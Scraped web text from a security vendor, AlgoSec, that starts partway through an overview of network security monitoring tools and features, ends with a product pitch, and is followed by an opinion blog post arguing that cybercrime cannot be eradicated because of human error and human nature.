commonly used for log data and event analysis. You can use it to centralize logs, perform real-time analysis, and create dashboards for network security monitoring. The toolset provides high-quality correlation through large data sets and provides security teams with significant opportunities to improve security and network performance using automation. 5. Cisco Stealthwatch Cisco Stealthwatch is a commercial network traffic analysis and monitoring solution. It uses NetFlow and other data sources to detect and respond to security threats, monitor network behavior, and provide visibility into your network traffic. It’s a highly effective solution for conducting network traffic analysis, allowing security analysts to identify threats that have infiltrated network assets before they get a chance to do serious damage. 6. Wireshark Wireshark is a widely-used open-source packet analyzer that allows you to capture and analyze network traffic in real-time. It can help you identify and troubleshoot network issues and is a valuable tool for security analysts. Unlike other entries on this list, it is not a fully-featured monitoring platform that collects and analyzes data at scale – it focuses on providing deep visibility into specific data flows one at a time. 7. Snort Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that can monitor network traffic for signs of suspicious or malicious activity. It’s highly customizable and has a large community of users and contributors. It supports customized rulesets and is easy to use. Snort is widely compatible with other security technologies, allowing users to feed signature updates and add logging capabilities to its basic functionality very easily. However, it’s an older technology that doesn’t natively support some modern features users will expect it to. 8. Suricata Suricata is another open-source IDS/IPS tool that can analyze network traffic for threats. It offers high-performance features and supports rules compatible with Snort, making it a good alternative. Suricata was developed more recently than Snort, which means it supports modern workflow features like multithreading and file extraction. Unlike Snort, Suricata supports application-layer detection rules and can identify traffic on non-standard ports based on the traffic protocol. 9. Zeek (formerly Bro) Zeek is an open-source network analysis framework that focuses on providing detailed insights into network activity. It can help you detect and analyze potential security incidents and is often used alongside other NSM tools. This tool helps security analysts categorize and model network traffic by protocol, making it easier to inspect large volumes of data. Like Suricata, it runs on the application layer and can differentiate between protocols. Essential Network Monitoring Features Traffic Analysis The ability to capture, analyze, and decode network traffic in real-time is a basic functionality all network security monitoring tools should share. Ideally, it should also include support for various network protocols and allow users to categorize traffic based on those categories. Alerts and Notifications Reliable alerts and notifications for suspicious network activity, enabling timely response to security threats. To avoid overwhelming analysts with data and contributing to alert fatigue, these notifications should consolidate data with other tools in your security tech stack. Log Management Your network monitoring tool should contribute to centralized log management through network devices, apps, and security sensors for easy correlation and analysis. This is best achieved by integrating a SIEM platform into your tech stack, but you may not wish to store all of your network’s logs on the SIEM, because of the added expense. Threat Detection Unlike regular network traffic monitoring, network security monitoring focuses on indicators of compromise in network activity. Your tool should utilize a combination of signature-based detection, anomaly detection, and behavioral analysis to identify potential security threats. Incident Response Support Your network monitoring solution should facilitate the investigation of security incidents by providing contextual information, historical data, and forensic capabilities. It may correlate detected security events so that analysts can conduct investigations more rapidly, and improve security outcomes by reducing false positives. Network Visibility Best-in-class network security monitoring tools offer insights into network traffic patterns, device interactions, and potential blind spots to enhance network monitoring and troubleshooting. To do this, they must connect with every asset on the network and successfully observe data transfers between assets. Integration No single security tool can be trusted to do everything on its own. Your network security monitoring platform must integrate with other security solutions, such as firewalls, intrusion detection/prevention systems (IDS/IPS), and SIEM platforms to create a comprehensive security ecosystem. If one tool fails to detect malicious activity, another may succeed. Customization No two organizations are the same. The best network monitoring solutions allow users to customize rules, alerts, and policies to align with specific security requirements and network environments. These customizations help security teams reduce alert fatigue and focus their efforts on the most important data traffic flows on the network. Advanced Features for Identifying Vulnerabilities & Weaknesses Threat Intelligence Integration Threat intelligence feeds enhance threat detection and response capabilities by providing in-depth information about the tactics, techniques, and procedures used by threat actors. These feeds update constantly to reflect the latest information on cybercriminal activities so analysts always have the latest data. Forensic Capabilities Detailed data and forensic tools provide in-depth analysis of security breaches and related incidents, allowing analysts to attribute attacks to hackers and discover the extent of cyberattacks. With retroactive forensics, investigators can include historical network data and look for evidence of compromise in the past. Automated Response Automated responses to security threats can isolate affected devices or modify firewall rules the moment malicious behavior is detected. Automated detection and response workflows must be carefully configured to avoid business disruptions stemming from misconfigured algorithms repeatedly denying legitimate traffic. Application-level Visibility Some network security monitoring tools can identify and classify network traffic by applications and services , enabling granular control and monitoring. This makes it easier for analysts to categorize traffic based on its protocol, which can streamline investigations into attacks that take place on the application layer. Cloud and Virtual Network Support Cloud-enabled organizations need monitoring capabilities that support cloud environments and virtualized networks. Without visibility into these parts of the hybrid network, security vulnerabilities may go unnoticed. Cloud-native network monitoring tools must include data on public and private cloud instances as well as containerized assets. Machine Learning and AI Advanced machine learning and artificial intelligence algorithms can improve threat detection accuracy and reduce false positives. These features often work by examining large-scale network traffic data and identifying patterns within the dataset. Different vendors have different AI models and varying levels of competence with emerging AI technology. User and Entity Behavior Analytics (UEBA) UEBA platforms monitor asset behaviors to detect insider threats and compromised accounts. This advanced feature allows analysts to assign dynamic risk scores to authenticated users and assets, triggering alerts when their activities deviate too far from their established routine. Threat Hunting Tools Network monitoring tools can provide extra features and workflows for proactive threat hunting and security analysis. These tools may match observed behaviors with known indicators of compromise, or match observed traffic patterns with the tactics, techniques, and procedures of known threat actors. AlgoSec: The Preferred Network Security Monitoring Solution AlgoSec has earned an impressive reputation for its network security policy management capabilities. The platform empowers security analysts and IT administrators to manage and optimize network security policies effectively. It includes comprehensive firewall policy and change management capabilities along with comprehensive solutions for automating application connectivity across the hybrid network. Here are some reasons why IT leaders choose AlgoSec as their preferred network security policy management solution: Policy Optimsization: AlgoSec can analyze firewall rules and network security policies to identify redundant or conflicting rules, helping organizations optimize their security posture and improve rule efficiency. Change Management: It offers tools for tracking and managing changes to firewall and network data policies, ensuring that changes are made in a controlled and compliant manner. Risk Assessment: AlgoSec can assess the potential security risks associated with firewall rule changes before they are implemented, helping organizations make informed decisions. Compliance Reporting: It provides reports and dashboards to assist with compliance audits, making it easier to demonstrate regulatory compliance to regulators. Automation: AlgoSec offers automation capabilities to streamline policy management tasks, reducing the risk of human error and improving operational efficiency. Visibility: It provides visibility into network traffic and policy changes, helping security teams monitor and respond to potential security incidents. Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Errare humanum est

    Nick Ellsmore is an Australian cybersecurity professional whose thoughts on the future of cybersecurity are always insightful. Having a... Cloud Security Errare humanum est Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/25/21 Published Nick Ellsmore is an Australian cybersecurity professional whose thoughts on the future of cybersecurity are always insightful. Having a deep respect for Nick, I really enjoyed listening to his latest podcast “Episode 79 Making the cyber sector redundant with Nick Ellsmore” . As Nick opened the door to debate on “all the mildly controversial views” he has put forward in the podcast, I decided to take a stab at a couple of points made by Nick. For some mysterious reason, these points have touched my nerve. So, here we go. Nick: The cybersecurity industry, we spent so long trying to get people to listen to us and take the issue seriously, you know, we’re now getting that, you know. Are the businesses really responding because we were trying to get people to listen to us? Let me rephrase this question. Are the businesses really spending more on cybersecurity because we were trying to get people to listen to us? The “cynical me” tells me No. Businesses are spending more on cybersecurity because they are losing more due to cyber incidents. It’s not the number of incidents; it’s their impact that is increasingly becoming devastating. Over the last ten years, there were plenty of front-page headliners that shattered even seemingly unshakable businesses and government bodies. Think of Target attack in 2013, the Bank of Bangladesh heist in 2016, Equifax breach in 2017, SolarWinds hack in 2020 .. the list goes on. We all know how Uber tried to bribe attackers to sweep the stolen customer data under the rug. But how many companies have succeeded in doing so without being caught? How many cyber incidents have never been disclosed? These headliners don’t stop. Each of them is another reputational blow, impacted stock options, rolled heads, stressed-out PR teams trying to play down the issue, knee-jerk reaction to acquire snake-oil-selling startups, etc. We’re not even talking about skewed election results (a topic for another discussion). Each one of them comes at a considerable cost. So no wonder many geniuses now realise that spending on cybersecurity can actually mitigate those risks. It’s not our perseverance that finally started paying off. It’s their pockets that started hurting. Nick: I think it’s important that we don’t lose sight of the fact that this is actually a bad thing to have to spend money on. Like, the reason that we’re doing this is not healthy. .. no one gets up in the morning and says, wow, I can’t wait to, you know, put better locks on my doors. It’s not the locks we sell. We sell gym membership. We want people to do something now to stop bad things from happening in the future. It’s a concept of hygiene, insurance, prevention, health checks. People are free not to pursue these steps, and run their business the way they used to .. until they get hacked, get into the front page, wondering first “Why me?” and then appointing a scapegoat. Nick: And so I think we need to remember that, in a sense, our job is to create the entire redundancy of this sector. Like, if we actually do our job, well, then we all have to go and do something else, because security is no longer an issue. It won’t happen due to 2 main reasons. Émile Durkheim believed in a “society of saints”. Unfortunately, it is a utopia. Greed, hunger, jealousy, poverty are the never-ending satellites of the human race that will constantly fuel crime. Some of them are induced by wars, some — by corrupt regimes, some — by sanctions, some — by imperfect laws. But in the end — there will always be Haves and Have Nots, and therefore, fundamental inequality. And that will feed crime. “Errare humanum est” , Seneca. To err is human. Because of human errors, there will always be vulnerabilities in code. Because of human nature (and as its derivative, geopolitical or religious tension, domination, competition, nationalism, fight for resources), there will always be people willing to and capable of exploiting those vulnerabilities. Mix those two ingredients — and you get a perfect recipe for cybercrime. Multiply that with never-ending computerisation, automation, digital transformation, and you get a constantly growing attack surface. No matter how well we do our job, we can only control cybercrime and keep the lid on it, but we can’t eradicate it. Thinking we could would be utopic. Another important consideration here is budget constraints. Building proper security is never fun — it’s a tedious process that burns cash but produces no tangible outcome. Imagine a project with an allocated budget B to build a product P with a feature set F, in a timeframe T. Quite often, such a project will be underfinanced, potentially leading to a poor choice of coders, overcommitted promises, unrealistic expectations. Eventually leading to this (oldie, but goldie): Add cybersecurity to this picture, and you’ll get an extra step that seemingly complicates everything even further: The project investors will undoubtedly question why that extra step was needed. Is there a new feature that no one else has? Is there a unique solution to an old problem? None of that? Then what’s the justification for such over-complication? Planning for proper cybersecurity built-in is often perceived as FUD. If it’s not tangible, why do we need it? Customers won’t see it. No one will see it. Scary stories in the press? Nah, that’ll never happen to us. In some way, extra budgeting for cybersecurity is anti-capitalistic in nature. It increases the product cost and, therefore, its price, making it less competitive. It defeats the purpose of outsourcing product development, often making outsourcing impossible. From the business point of view, putting “Sec” into “DevOps” does not make sense. That’s Ok. No need. .. until it all gloriously hits the fan, and then we go back to STEP 1. Then, maybe, just maybe, the customer will say, “If we have budgeted for that extra step, then maybe we would have been better off”. Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

bottom of page